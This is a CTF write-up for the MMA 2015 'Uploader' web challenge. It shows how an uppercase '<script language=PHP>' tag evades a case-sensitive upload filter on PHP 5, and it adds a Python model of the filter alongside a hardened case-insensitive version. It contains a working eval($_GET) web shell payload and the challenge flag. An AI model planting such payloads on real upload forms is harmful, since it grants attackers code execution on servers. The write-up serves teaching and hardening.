[MMA 2015] [Web – Uploader] Write Up

Description

The upload script removes everything matching /<\?|php/, so you cannot run PHP.

You can only upload file whose name is captured by the regexp /^[a-zA-Z0-9]+\.[a-zA-Z0-9]+$/.

Resolution

The goal is clear: we must execute PHP code even though the filter strips the usual opening tags from every uploaded file.

Normally PHP code is opened with <?php, <? or <?=, but since the filter removes every occurrence of "<?" and "php", all three openers are destroyed and we are seemingly stuck.

A quick look at the PHP documentation gives a hint: the alternative opening syntax "<script language=php>" contains no "<?" and so is not caught by the first half of the regexp. That syntax was removed in PHP 7, but the HTTP response headers of the web server reveal PHP/5.5.9-1ubuntu4.11, an old enough version to still accept it.

We first tried to upload a file containing a small "<script language=php>echo time();</script>", but it failed: the filter also strips the word "php" from the tag, leaving "<script language=>", which PHP does not recognise.

What if the regexp is case-sensitive? The PHP lexer accepts the tag regardless of case, so let's write PHP in capital letters:

<script language=PHP>eval($_GET['q']);</script>

We then try to read the flag by passing the argument "q=echo file_get_contents('/flag');" (URL-encoded) to our uploaded script, and …

It works!

Flag is: MMA{you can run php from script tag}
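The challenge's server-side code is not on the page, so the following is an added model of its content filter, not the original upload script: it applies the stated regexp /<\?|php/ to a few candidate payloads to show exactly why the lowercase script tag dies and the uppercase one survives, and contrasts it with a hardened, case-insensitive variant (an assumption about how one would fix it, not something the challenge provided). The payload names and the filename check are also constructed for illustration.

```python
import re

# The challenge's stated content filter: every match of /<\?|php/ is removed.
# As the write-up found, the pattern is case-sensitive.
CONTENT_FILTER = re.compile(r"<\?|php")

# Hardened variant (an assumption, not from the challenge): case-insensitive,
# and it also strips "<script", which PHP < 7 treated as a code delimiter.
HARDENED_FILTER = re.compile(r"<\?|php|<script", re.IGNORECASE)

# The challenge's stated filename whitelist.
FILENAME_RE = re.compile(r"^[a-zA-Z0-9]+\.[a-zA-Z0-9]+$")

# Constructed candidate uploads: the three normal openers and the two
# script-tag variants tried in the write-up.
PAYLOADS = {
    "short_tag": "<? echo time(); ?>",
    "echo_tag": "<?= time() ?>",
    "php_tag": "<?php echo time(); ?>",
    "script_lower": "<script language=php>echo time();</script>",
    "script_upper": "<script language=PHP>eval($_GET['q']);</script>",
}


def filename_allowed(name: str) -> bool:
    """True if the filename passes the challenge's whitelist regexp."""
    return FILENAME_RE.match(name) is not None


def filter_content(data: str, pattern: re.Pattern = CONTENT_FILTER) -> str:
    """Return the file content as the server would store it after filtering."""
    return pattern.sub("", data)


def survives(payload: str, pattern: re.Pattern = CONTENT_FILTER) -> bool:
    """True if the payload is stored byte-for-byte unchanged."""
    return filter_content(payload, pattern) == payload


def classify(pattern: re.Pattern = CONTENT_FILTER) -> dict:
    """Map each payload name to whether it survives the given filter intact."""
    return {name: survives(body, pattern) for name, body in PAYLOADS.items()}


if __name__ == "__main__":
    for name, body in PAYLOADS.items():
        stored = filter_content(body)
        print(f"{name:13s} {'OK  ' if stored == body else 'DEAD'} -> {stored!r}")
    print("hardened:", classify(HARDENED_FILTER))
```

Running it shows the lowercase script tag reduced to "<script language=>" while the uppercase variant passes untouched; under the hardened filter every payload is mangled, which is the point of adding the i flag (and the `<script` alternative) on a PHP 5 host.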
